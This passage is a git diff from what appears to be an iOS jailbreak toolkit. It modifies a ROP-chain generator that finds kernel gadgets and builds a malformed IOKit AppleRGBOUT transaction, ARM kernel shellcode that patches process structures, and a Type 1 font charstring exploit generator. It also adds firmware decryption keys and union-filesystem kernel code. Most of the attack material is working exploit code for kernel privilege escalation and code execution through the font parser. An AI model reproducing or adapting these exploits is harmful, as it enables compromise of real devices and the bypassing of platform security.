diff --git a/catalog/catalog.py b/catalog/catalog.py index 1361206..c7ec809 100644 --- a/catalog/catalog.py +++ b/catalog/catalog.py @@ -20,6 +20,11 @@ mode, device, version, cachefile, kernfile, patchfile, kcode, outfile = sys.argv[1:9] four_dot_three = '4.3' in version +if four_dot_three: + memcpy = '_memcpy$VARIANT$CortexA' + ('9' if device.startswith('iPad2') else '8') +else: + memcpy = '_memcpy' + assert mode in ['dejavu', 'untether'] patchfp = open(patchfile) @@ -29,14 +34,18 @@ def add_lib(conn, short, path): lib_paths.add(path) debugging = True +result_for = None def dbg_result(): + global result_for if debugging: + if result_for is None: + result_for = ptr('Result for %s was %08x\n', True) result, resultp = stackunkpair() store_r0_to(resultp) back = sys._getframe().f_back - funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True) + funcall('_fprintf', dmini.cur.sym('___stderrp'), result_for, ptr('%s:%d' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True) dmini.init(kernfile, False) @@ -59,14 +68,10 @@ def dbg_result(): weirdfile = pointed(weirdfile + I(sysent, count) + stuff) def mov_r0_r6(): - set_fwd('PC', dmini.cur.find('+ 30 46 70 bd')) - exhaust_fwd('R4', 'R5', 'R6') - heapadd(fwd('R4'), fwd('R5'), fwd('R6'), fwd('PC')) + gadget(PC='+ 30 46 70 bd', a='R4, R5, R6, PC') def str_r7_sp_856(): - set_fwd('PC', dmini.cur.find('+ d6 97 e9 bd')) - exhaust_fwd('R0', 'R3', 'R5', 'R6', 'R7') - heapadd(fwd('R0'), fwd('R3'), fwd('R5'), fwd('R6'), fwd('R7'), fwd('PC')) + gadget(PC='+ d6 97 e9 bd', a='R0, R3, R5, R6, R7, PC') def seek_kernel_ldm(reg): s = chr(0x90 | reg) + chr(0xe8) @@ -81,16 +86,16 @@ def seek_kernel_ldm(reg): if (i & 3) != 2: continue insn, = struct.unpack('I', data[i-2:i+2]) regs = [b for (n, b) in enumerate(['R0', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7', 'R8', 'R9', 'R10', 'R11', 'R12', 'SP', 'LR', 'PC']) if (insn & (1 << n))] - if 'SP' not in regs or 'PC' not in regs: continue - if 'R0' in regs or 'R7' in regs: continue + if 'SP' not in regs or 'PC' not in regs or 'LR' not in regs: continue + if 'R0' in regs or 'R6' in regs or 'R7' in regs: continue # got it return (dmini.cur.nth_segment(seg).start + i - 2, regs) seg += 1 -# 12_41, 31_41, 31_421: R6 -kernel_ldm, kernel_ldm_regs = seek_kernel_ldm(11 if four_dot_three else 6) +# 12_41, 31_41, 31_421: R6, no I lied +kernel_ldm, kernel_ldm_regs = seek_kernel_ldm(11 if four_dot_three else 2) #kernel_ldm = 0xdeadbeef init(*kernel_ldm_regs) @@ -100,6 +105,12 @@ def seek_kernel_ldm(reg): m = pointed('') set_fwd('SP', pointer(m)) heapadd(m) + +# mov pc, r9 +set_fwd('PC', dmini.cur.find('- 1e ff 2f e1 1e ff 2f e1')) +goo.fwds['PC'] = goo.fwds['LR'] +del goo.fwds['LR'] + mov_r0_r6() store_r0_to(obj) str_r7_sp_856() @@ -111,8 +122,8 @@ def seek_kernel_ldm(reg): set_fwd('PC', code_addr) -kstuff = finalize(None, must_be_simple=False, should_heapdump=False) -kstuff += '\0'*(856 + 0x38 + 4 - len(kstuff)) # xxx offset +kstuff = finalize(None, must_be_simple=False, should_heapdump=True); +kstuff.append('\0'*1024) def set_cache(cachefile): conn = dmini.Connection(cachefile, True) @@ -159,10 +170,18 @@ def do_main_thing(): funcall('_mach_task_self') store_r0_to(task_self_p) - set_r0_to(kstuffp); dbg_result() + if not four_dot_three: + funcall(memcpy, kstuffp, real_kstuffp, fake_kstuff_len) + + #funcall(memcpy, kstuffp, ptrI(0xdeadbeef, pointer(m), 0, 0, 0, 0, 0, 0x80002000, 0xdeadbeef, 0xdeadbee0), fake_kstuff_len) + + if debugging: + set_r0_to(kstuffp); dbg_result() # The manpage says this returns EINVAL, but in fact the kernel handles it. - funcall('_mlock', kstuffp, len(kstuff)); dbg_result() + funcall('_mlock', kstuffp, len(kstuff) if four_dot_three else (16 + fake_kstuff_len + len(kstuff))); dbg_result() + + #funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Opening %s\n', True), AppleRGBOUT, load_r0=True) funcall('iokit._IOServiceMatching', AppleRGBOUT) store_r0_to(matchingp) @@ -172,7 +191,6 @@ def do_main_thing(): funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result() else: # http://www.opensource.apple.com/source/IOKitUser/IOKitUser-502/FireWireTest.cpp?txt - #itp = ptrI(0) # XXX this is just for testing portp = ptrI(0) funcall('_mach_task_self') funcall('_mach_port_allocate', None, 1, portp); dbg_result() @@ -205,8 +223,6 @@ def do_main_thing(): funcall('iokit._IOConnectCallStructMethod', connect, 5, transactionp, len(transaction), 0, 0, load_r0=True); dbg_result() #funcall('_sleep', 1000) - #dbg_result(); funcall('_abort') - # do some housekeeping # (but don't bother if we're going to exec) @@ -241,20 +257,26 @@ def do_main_thing(): elif mode == 'dejavu': init('R4', 'R5', 'PC') -kstuffp = ptr(kstuff + '\0'*32) +if four_dot_three: + kstuffp = ptr(kstuff) +else: + fake_kstuff_len = 4 * len(kernel_ldm_regs) + kstuffp = ptr('\0' * fake_kstuff_len, align=8, align_offset=6) + real_kstuffp = ptr(kstuff) zerop = ptrI(0) -AppleRGBOUT = ptr('AppleM2TVOut' if device in ['iPhone2,1', 'iPod3,1'] else 'AppleRGBOUT', True) +AppleRGBOUT = ptr('AppleM2CLCD' if device in ['iPhone2,1', 'iPod3,1'] else 'AppleRGBOUT', True) # if four_dot_three else 'AppleCLCD', True) connect = ptrI(0) fail_callback = ptrI(dmini.cur.sym('_getpid'), 0xeeeeeeee) transaction = troll_string('\x00' * (0xd8 if four_dot_three else 0x8c)) transaction[0:4] = transaction[4:8] = I(0xeeeeeeee) -transaction[8:0xc] = I(kstuffp) # surface saved in r11 transaction[0x58:0x5c] = I(kernel_ldm) if four_dot_three: transaction[0xb8:0xbc] = I(6) # run iterations 1 and 2 (first loop bails at 1) + transaction[8:0xc] = I(kstuffp) # surface saved in r11 else: - transaction[0x70:0x74] = I(6) + transaction[0x70:0x74] = I(kstuffp) # overlapping the address and "6" + transaction[8:0xc] = I(0xdeadbeef) # no idea transaction = simplify(transaction) transactionp = ptr(transaction) if mode == 'dejavu': @@ -291,6 +313,6 @@ def do_main_thing(): init_sp = 0x10031000 address = 0x8000 - final = finalize(address) - #heapdump(final) + final = finalize(address, should_heapdump=True) open(outfile, 'w').write(pickle.dumps({'segment': final, 'initializer': initializer, 'init_sp': init_sp, 'rop_address': address, 'libs': lib_paths, 'dylib': False})) + diff --git a/catalog/kcode.S b/catalog/kcode.S index d24b4b2..91eb45c 100644 --- a/catalog/kcode.S +++ b/catalog/kcode.S @@ -8,14 +8,26 @@ .arm start: # xxx offset - ldr sp, [sp, #(856 + 0x38 - 0x98)] + ldr sp, [sp, #(856 + 0x40 - 0xa0)] sub sp, #0x18 +#if 0 + mov r5, sp; mov sp, #0x80000000; orr sp, #0x2000; mov pc, #-1 +#endif + +#if VERSION >= 0x040206 && VERSION < 0x040300 + ldr r6, [sp, #(0x3c - 0x30 - 0x24)] +#else ldr r6, [r4] +#endif adr r0, inspiring bl _IOLog + #mov r0, #105 + #mov r1, #9 + #blx _proc_signal + #mov r8, #0; b end adr r5, stuff @@ -42,6 +54,14 @@ end: str r8, [r6, #c(0x238, 0x19c)] str r8, [r6, #c(0x2d4, 0x238)] # fix up linked lists +#if 0 && (VERSION < 0x040300) + add r0, r6, #0x170 + str r0, [r6, #0x170] + str r0, [r6, #0x174] + add r0, r6, #0x178 + str r0, [r6, #0x178] + str r0, [r6, #0x17c] +#endif add r0, r6, #c(0x218, 0x180) str r0, [r6, #c(0x21c, 0x184)] add r0, r6, #c(0x220, 0x188) @@ -79,7 +99,7 @@ syscall_0: mov r1, #0 str r1, [r0, #0xc] str r1, [r0, #0x10] - ldr r0, [r0, #0x6c] + ldr r0, [r0, #c(0x6c, 0x80)] cmp r0, #0 strne r1, [r0, #8] #endif diff --git a/common/common.h b/common/common.h index e3cf255..309923d 100644 --- a/common/common.h +++ b/common/common.h @@ -38,9 +38,9 @@ static void _assert_zero_helper(const char name[], const char *arg, unsigned int #endif #ifdef PROFILING -#define TIME(thing) do { uint64_t _ta = time_ms(); thing; uint64_t _tb = time_ms(); _logI("[%.4ld ms] %s", (long int) (_tb - _ta), #thing); } while(0) +#define TIME(thing...) do { uint64_t _ta = time_ms(); thing; uint64_t _tb = time_ms(); _logI("[%.4ld ms] %s", (long int) (_tb - _ta), #thing); } while(0) #else -#define TIME(thing) thing +#define TIME(thing...) do { thing; } while(0) #endif static inline uint64_t time_ms() { diff --git a/config/keyz.txt b/config/keyz.txt index 80bac63..d47304e 100644 --- a/config/keyz.txt +++ b/config/keyz.txt @@ -492,3 +492,54 @@ iPhone3,1_4.3.3_8J2.iBSS: 8ef00005aa2c01ae409d55e330171589af79d76ac86639e7600383 iPhone3,1_4.3.3_8J2.iBEC: 54800715047034f61f786642e9caea65723ff410495dc68e7125c0519add859b e9467d0a0d35b1f2bcec6d0a60d0b499 iPhone3,1_4.3.3_8J2.KernelCache: 65c351330f824889fe25b14e2d0cb5e291991a749f13761b825a70f317f005aa 301c0db0f6fc3a92c34f34b2dff5d92f +iPhone3,3_4.2.6_8E200.fs: 723ded674deb1cba56a142542a0b06d2a483297f8056c0cfa70346c0724e1b0e03feded6 +iPhone3,3_4.2.6_8E200.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd +iPhone3,3_4.2.6_8E200.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3 +iPhone3,3_4.2.6_8E200.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b +iPhone3,3_4.2.6_8E200.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cbc47cb1f3 +iPhone3,3_4.2.6_8E200.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03 +iPhone3,3_4.2.6_8E200.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7 +iPhone3,3_4.2.6_8E200.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc +iPhone3,3_4.2.6_8E200.GlyphCharging: 39c4f58aacb8f2a46ee43822befbc083313c2aa44bf7afc4d204d5d5aac6be2e 4cefae53fea79f566b70cbc5964a977e +iPhone3,3_4.2.6_8E200.GlyphPlugin: 28b7fcbd208ee5e46c7cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741 +iPhone3,3_4.2.6_8E200.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c +iPhone3,3_4.2.6_8E200.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4 +iPhone3,3_4.2.6_8E200.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45 +iPhone3,3_4.2.6_8E200.KernelCache: c31ace63b79048c5e1071201e07f8a6f23444e5062d57397a3b3d84ae68dc008 eef93c11b4795bb4b34ffb1cdd63713a +iPhone3,3_4.2.6_8E200.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de8799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa +iPhone3,3_4.2.6_8E200.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1 + +iPhone3,3_4.2.7_8E303.fs: 612f78042ddc5337ab1abecfb59a07e88ed3e80665a035ef02c3c48045057fc29ab0a4b5 +iPhone3,3_4.2.7_8E303.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd +iPhone3,3_4.2.7_8E303.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3 +iPhone3,3_4.2.7_8E303.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b +iPhone3,3_4.2.7_8E303.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cbc47cb1f3 +iPhone3,3_4.2.7_8E303.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03 +iPhone3,3_4.2.7_8E303.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7 +iPhone3,3_4.2.7_8E303.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc +iPhone3,3_4.2.7_8E303.GlyphCharging: 39c4f58aacb8f2a46ee43822befbc083313c2aa44bf7afc4d204d5d5aac6be2e 4cefae53fea79f566b70cbc5964a977e +iPhone3,3_4.2.7_8E303.GlyphPlugin: 28b7fcbd208ee5e46c7cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741 +iPhone3,3_4.2.7_8E303.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c +iPhone3,3_4.2.7_8E303.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4 +iPhone3,3_4.2.7_8E303.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45 +iPhone3,3_4.2.7_8E303.KernelCache: b953f74572156c933368875730f4d97ac09ba66d17dbcf1ef169894d35ceff61 72032759def5211d217f26473d668430 +iPhone3,3_4.2.7_8E303.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de8799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa +iPhone3,3_4.2.7_8E303.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1 + +iPhone3,3_4.2.8_8E401.fs: d8e162215f27c016ed8d1849c6059f99984c766c72cec4a1df63724491c8e5b19c0e6fb2 +iPhone3,3_4.2.8_8E401.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd +iPhone3,3_4.2.8_8E401.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3 +iPhone3,3_4.2.8_8E401.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b +iPhone3,3_4.2.8_8E401.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cb47cb1f3 +iPhone3,3_4.2.8_8E401.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03 +iPhone3,3_4.2.8_8E401.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7 +iPhone3,3_4.2.8_8E401.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc +iPhone3,3_4.2.8_8E401.GlyphCharging: +iPhone3,3_4.2.8_8E401.GlyphPlugin: 28b7fcbd208ee5e467cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741 +iPhone3,3_4.2.8_8E401.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c +iPhone3,3_4.2.8_8E401.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4 +iPhone3,3_4.2.8_8E401.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45 +iPhone3,3_4.2.8_8E401.KernelCache: 21dc139511829abfb346d78f9c1c17d50bff33716e7619fee8338b99025ffa3e 851c4efdb0db569f39549e5a13e0784a +iPhone3,3_4.2.8_8E401.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa +iPhone3,3_4.2.8_8E401.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1 + diff --git a/data b/data index bbe6272..be67f52 160000 --- a/data +++ b/data @@ -1 +1 @@ -Subproject commit bbe627215be78161abef59253dff3f12f21cecfa +Subproject commit be67f52507d9607e4353d1d91d379eec1a8ea347 diff --git a/dejavu/gen_dejavu.raw.py b/dejavu/gen_dejavu.raw.py index 8364d0e..8c91eb0 100644 --- a/dejavu/gen_dejavu.raw.py +++ b/dejavu/gen_dejavu.raw.py @@ -124,7 +124,7 @@ def encode_unknown(s): diffs_seen = set() for data in sorted(stuff, key=lambda d: d['personality'] - d['actual_parse_callback']): - diff = data['personality'] - data['actual_parse_callback'] + diff = data['personality'] - data['actual_parse_callback'] - 1 if diff in diffs_seen: raise Exception('duplicate') diffs_seen.add(diff) @@ -132,7 +132,7 @@ def encode_unknown(s): assert data['parse_callback'] > 32000 assert data['actual_parse_callback'] > 32000 - le_chain += str(subrno) + ' 1 1 25 callothersubr ' + xrepr_plus_small(diff, False, [4, 27]) + ' callothersubr\n' + le_chain += str(subrno) + ' 4 1 25 callothersubr ' + xrepr_plus_small(diff, False, [4, 27]) + ' callothersubr\n' subr = '''1 1 25 callothersubr % get parse_callback {actual_pc} 2 21 callothersubr % subtract the real one @@ -203,7 +203,7 @@ def encode_unknown(s): 0 0 0 3 0 callothersubr 2 2 24 callothersubr % buildchar -> bca[2] - -150 42 callothersubr % back up to 398 get gxx_personality_sj0 + -152 42 callothersubr % back up to 398 get gxx_personality_sj0 setcurrentpoint hstem3 hstem3 hstem3 hstem3 @@ -213,9 +213,19 @@ def encode_unknown(s): hstem3 hstem3 hstem3 hstem3 hstem3 hstem3 hstem3 hstem3 - 252 42 callothersubr % this had better get us to 20 (or actually 0!) down when it does 31000 stuff + %252 42 callothersubr % this had better get us to 20 (or actually 0!) down when it does 31000 stuff + + 0 12 callothersubr % actually, enforce that we're at 0 31000 3 2 24 callothersubr % idx = 31000 + + 1 1 25 callothersubr % first + 1 1 25 callothersubr % second + 2 div % / 2 + 2 2 22 callothersubr % * 2 + 2 21 callothersubr % x - ((x / 2) * 2) + 2 2 20 callothersubr % + 2, so it's 1 or 2 + callsubr 3 callsubr % flex again 0 0 0 3 0 callothersubr % personality @@ -224,14 +234,6 @@ def encode_unknown(s): 4 2 24 callothersubr % store to 4 hmoveto % ignore x - 1 1 25 callothersubr % first - 1 1 25 callothersubr % second - 2 div % / 2 - 2 2 22 callothersubr % * 2 - 2 21 callothersubr % x - ((x / 2) * 2) - callsubr - - {le_chain} diff --git a/fs/fs.h b/fs/fs.h index 23287df..d8464b8 100644 --- a/fs/fs.h +++ b/fs/fs.h @@ -17,7 +17,11 @@ uio_t x_uio_createwithbuffer(int a_iovcount, off_t a_offset, int a_spacetype, in void x_vnode_reclaim_internal(struct vnode * vp, int locked, int reuse, int flags) asm("$bl3__vnode_recycle"); #define vnode_reclaim_internal x_vnode_reclaim_internal -errno_t x_vn_create(vnode_t, vnode_t *, struct nameidata *, struct vnode_attr *, int flags, int mode, int unk, vfs_context_t) +#if VERSION >= 0x040300 +errno_t x_vn_create(vnode_t dvp, vnode_t *vpp, struct nameidata *ndp, struct vnode_attr *vap, int flags, int mode, int unk, vfs_context_t ctx) +#else +errno_t x_vn_create(vnode_t dvp, vnode_t *vpp, struct componentname *cnp, struct vnode_attr *vap, int flags, vfs_context_t ctx) +#endif asm("$strref_22_76_6e_6f_64_65_5f_63_72_65_61_74_65_3a_20_75_6e_6b_6e_6f_77_6e_20_76_74_79_70_65_20_25_64"); // '"vnode_create: unknown vtype %d' #define vn_create x_vn_create @@ -173,7 +177,9 @@ asm("$ldr_$_T_df_f8_fc_31_1b_68_6b_b1"); #endif extern void IOLog(const char *fmt, ...) __attribute__((format (printf, 1, 2))); -#if !DEBUG_PRINTF +#if DEBUG_PRINTF +#define printf IOLog +#else #define printf(args...) ((void) (args)) #endif diff --git a/fs/union/union_subr.c b/fs/union/union_subr.c index bc0d3cf..999690e 100644 --- a/fs/union/union_subr.c +++ b/fs/union/union_subr.c @@ -1046,7 +1046,11 @@ union_mkshadow(um, dvp, cnp, vat, vpp) VATTR_SET(&va, va_change_time, vat->va_change_time); //VATTR_SET(&va, va_backup_time, vat->va_backup_time); +#if VERSION >= 0x040300 error = vn_create(dvp, vpp, CNTOND(&cn), &va, 0, 0, 0, cnp->cn_context); +#else + error = vn_create(dvp, vpp, &cn, &va, 0, cnp->cn_context); +#endif out: if ((cn.cn_flags & HASBUF) == HASBUF) { FREE_ZONE(cn.cn_pnbuf, cn.cn_pnlen, M_NAMEI); @@ -1200,7 +1204,11 @@ union_vn_create(struct vnode **vpp, struct union_node *un, mode_t cmode, vfs_con VATTR_SET(vap, va_type, VREG); VATTR_SET(vap, va_mode, cmode); +#if VERSION >= 0x040300 if ((error = vn_create(un->un_dirvp, &vp, CNTOND(&cn), vap, 0, 0, 0, context)) != 0) { +#else + if ((error = vn_create(un->un_dirvp, &vp, &cn, vap, 0, context)) != 0) { +#endif goto out; } diff --git a/fs/union/union_vnops.c b/fs/union/union_vnops.c index cf30b99..4844acc 100644 --- a/fs/union/union_vnops.c +++ b/fs/union/union_vnops.c @@ -230,8 +230,16 @@ union_lookup(struct vnop_lookup_args *ap) uppervp = NULLVP; lowervp = NULLVP; printf("in: %p RC=%d / %d\n", dun->un_uppervp, dun->un_uppervp ? dun->un_uppervp->v_iocount : -1, uppervp ? uppervp->v_iocount : -1); + + char slash = cnp->cn_nameptr[cnp->cn_namelen] != 0; - printf("looking up %s lp=%d wp=%d nameiop=%d upperdvp=%p lowerdvp=%p\n", cnp->cn_nameptr, old_flags & LOCKPARENT, old_flags & WANTPARENT, cnp->cn_nameiop, upperdvp, lowerdvp); + const char *nameiop = "?"; + switch(cnp->cn_nameiop) { + #define A(x) case x: nameiop = #x; break; + A(LOOKUP) A(CREATE) A(DELETE) A(RENAME) + #undef A + } + printf("looking up %s(%d) lp=%d wp=%d nameiop=%s upperdvp=%p lowerdvp=%p slash=%d\n", cnp->cn_nameptr, (int) cnp->cn_namelen, old_flags & LOCKPARENT, old_flags & WANTPARENT, nameiop, upperdvp, lowerdvp, (int) slash); union_unlock(); @@ -247,24 +255,16 @@ union_lookup(struct vnop_lookup_args *ap) * on and just return that vnode. */ if(um->um_uppervp != NULLVP && upperdvp != NULLVP) { - printf("lin: %p RC=%d\n", upperdvp, upperdvp ? upperdvp->v_iocount : -1); uerror = union_lookup1(um->um_uppervp, &upperdvp, &uppervp, cnp); - printf("lout: %p RC=%d\n", upperdvp, upperdvp ? upperdvp->v_iocount : -1); - if (cnp->cn_consume != 0) { + if(cnp->cn_consume != 0 || (!uerror && !vnode_isdir(uppervp))) { vnode_get(*ap->a_vpp = uppervp); error = uerror; goto out; } - if(!uerror && !vnode_isdir(uppervp)) { - vnode_get(*ap->a_vpp = uppervp); - error = uerror; - goto out; - } - - if(uerror && uerror != ENOENT) { + if(uerror && uerror != ENOENT && uerror != EJUSTRETURN) { error = uerror; goto out; } @@ -284,13 +284,13 @@ union_lookup(struct vnop_lookup_args *ap) lerror = union_lookup1(um->um_lowervp, &lowerdvp, &lowervp, cnp); - if (cnp->cn_consume != 0 || (!lerror && !vnode_isdir(lowervp))) { + if(cnp->cn_consume != 0 || (!lerror && !vnode_isdir(lowervp))) { vnode_get(*ap->a_vpp = lowervp); error = lerror; goto out; } - if(lerror && lerror != ENOENT) { + if(lerror && lerror != ENOENT && lerror != EJUSTRETURN) { error = lerror; goto out; } @@ -324,7 +324,11 @@ union_lookup(struct vnop_lookup_args *ap) /* case 1. */ if ((uerror != 0) && (lerror != 0)) { - error = uerror; + if(lerror == EJUSTRETURN || uerror == EJUSTRETURN) { + error = EJUSTRETURN; + } else { + error = uerror == ENOENT ? lerror : uerror; + } goto out; } @@ -377,18 +381,18 @@ union_lookup(struct vnop_lookup_args *ap) cnp->cn_flags = (cnp->cn_flags & ~(LOCKPARENT | WANTPARENT)) | old_flags; - if(*ap->a_vpp && cnp->cn_nameiop == DELETE) { - *CHUD(current_thread()) = !vnode_isdir(*ap->a_vpp); + if(cnp->cn_nameiop == DELETE) { + *CHUD(current_thread()) = *ap->a_vpp != NULLVP && !vnode_isdir(*ap->a_vpp); } // sigh - if(((error == EJUSTRETURN && cnp->cn_nameiop == RENAME) ? + if(!slash && + ((error == EJUSTRETURN && cnp->cn_nameiop == RENAME) ? *CHUD(current_thread()) : !((uppervp != NULLVP && vnode_isdir(uppervp)) || - (lowervp != NULLVP && vnode_isdir(lowervp)))) && + (lowervp != NULLVP && vnode_isdir(lowervp)))) && (cnp->cn_nameiop == CREATE || - cnp->cn_nameiop == RENAME || - 0/*cnp->cn_nameiop == DELETE*/) && + cnp->cn_nameiop == RENAME) && (error == 0 || error == EJUSTRETURN)) { printf("mega hack %p %p %p\n", ap->a_vpp[1], upper(ap->a_vpp[1]), lower(ap->a_vpp[1])); @@ -402,6 +406,11 @@ union_lookup(struct vnop_lookup_args *ap) vnode_get(ap->a_vpp[1] = newvp); vnode_put(ovp); if(locked) vnode_lock(newvp); + if(cnp->cn_nameiop == RENAME && *ap->a_vpp != NULLVP && newvp->v_mount != (*ap->a_vpp)->v_mount) { + vnode_put(*ap->a_vpp); + *ap->a_vpp = NULLVP; + if(error == 0) error = EJUSTRETURN; + } } } } @@ -427,6 +436,8 @@ union_create(struct vnop_create_args *ap) struct vnode *dvp = upper_or_lower(ap->a_dvp); struct componentname *cnp = ap->a_cnp; + printf("union_create %p %s\n", dvp, cnp->cn_nameptr); + if (dvp != NULLVP) { int error; struct vnode *vp; @@ -441,7 +452,7 @@ union_create(struct vnop_create_args *ap) return (error); /* if this is faulting filesystem and is a reg file, skip allocation of union node */ - if (UNNODE_FAULTIN(un) && (vp != NULLVP) && ((vnode_isreg(vp) != 0)|| (vnode_islnk(vp) != 0))) { + if(vp != NULLVP && !vnode_isdir(vp)) { *ap->a_vpp = vp; return(0); } diff --git a/goo/goo.py b/goo/goo.py index fd7b045..61f0911 100644 --- a/goo/goo.py +++ b/goo/goo.py @@ -28,13 +28,20 @@ def simplify(self, addr): def __repr__(self): return '' % self.name -def heapadd(*stuff): +def heapadds(heap, str, align=None, align_offset=0): + if align is not None: # max 16 in saffron + heap.append('\0' * (-(len(heap) - align_offset) & (align - 1))) + result = pointed(str) + heap.append(result) + return result + +def heapadd(*stuff, **kwargs): global heap #heap.dbginfo.append((len(heap), getdebugname())) # so we know where we came from heap.bits.append(debug_marker(getdebugname())) for a in stuff: assert not isinstance(a, (troll_string, str)) or len(a) % 4 == 0 - heap.append(I(a)) + heapadds(heap, I(a), **kwargs) def xrepr(a): if isinstance(a, (int, long)): @@ -69,13 +76,11 @@ def heapdump(heap, names=None): sys.stdout.write('\n') sys.stdout.write('%08x end\n' % pos) -def ptr(str, null_terminate=False, heap=None): +def ptr(str, null_terminate=False, heap=None, align_offset=0, **kwargs): if heap is None: heap = sheap if null_terminate: str += '\0' - str = pad(str, 4) - result = pointed(str) - heap.append(result) - return pointer(result) + str = pad(str, 4, -align_offset & 3) + return pointer(heapadds(heap, str, align_offset=align_offset, **kwargs)) def ptrI(*xs, **kwargs): return ptr(reduce(operator.add, map(I, xs)), **kwargs) @@ -143,7 +148,7 @@ def init(*regs, **kwargs): def finalize(heapaddr=None, must_be_simple=True, should_heapdump=False): global heap, sheap, keep_debugs clear_fwd() - nheap = heap + sheap + nheap = pad(heap, 16) + sheap if should_heapdump: nheap = simplify_times(nheap, heapaddr, 4, False) heapdump(nheap) diff --git a/goo/goop.py b/goo/goop.py index 74b79bb..16c7d21 100644 --- a/goo/goop.py +++ b/goo/goop.py @@ -8,9 +8,9 @@ def getdebugname(): if True and ('world' in fn or 'goo' in fn): continue return '%s:%d' % (fn, f.f_lineno) -def pad(x, p): +def pad(x, p, offset=0): l = len(x) - return x + '\0' * (-l & (p - 1)) + return x + '\0' * (-(l - offset) & (p - 